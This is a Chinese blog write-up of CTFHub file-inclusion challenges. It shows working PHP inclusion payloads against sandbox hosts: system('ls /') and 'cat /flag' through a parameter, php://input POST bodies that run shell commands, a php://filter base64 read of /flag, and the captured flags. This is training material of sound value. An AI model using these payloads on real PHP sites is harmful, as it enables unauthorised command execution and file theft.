CTFHUB-RCE-文件包含

本文详细讲述了PHP中file和input伪协议的利用技巧,包括通过Hackbar构造Payload、抓包POST请求、filter协议解码和远程包含,最终演示如何在CTF挑战中成功获取flag。涉及知识点有shell执行、编码解码和安全防护措施的突破。
摘要由CSDN通过智能技术生成

考点
php伪协议 file协议
分析过程
在这里插入图片描述
Shell是这个
在这里插入图片描述

使用hackbar 构造Playload传参

http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt
ctfhub=system('ls /');
ctfhub=system('cat /flag');

在这里插入图片描述
得到flag

ctfhub{3a551fa301f8dda0dccd2c7d} 

php://input

考点
php伪协议 input协议
分析思路

抓包 把请求方式改成POST
开头POST /file=php://input HTTP/1.1
在这里插入图片描述
可以用 那没事了
playload

<?php system("ls /")?>
<?php system("cat /flag_21695")?>

在这里插入图片描述
得到flag

ctfhub{552db4f70a996a20ca7ae8ec}

读取源代码

考点
php伪协议中的filter协议
思路分析

他告诉了flag的位置
考虑使用filter协议
构造playload:

http://challenge-1b95d33e2212f9fb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag

在这里插入图片描述
解码

得到flag

ctfhub{e4be0c887bb918fc7e4c55c8}

远程包含

考点
伪协议 伪协议
思路分析
1
用file包含phpinfo是有回显的,所以构造
payload :

xxx:10080/?file=php://input
post <?php system('ls /');?>
<?php system('cat /flag');?>

在这里插入图片描述
在这里插入图片描述
得到flag

ctfhub{42c0e127f9a470f3f91d1eaa} 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值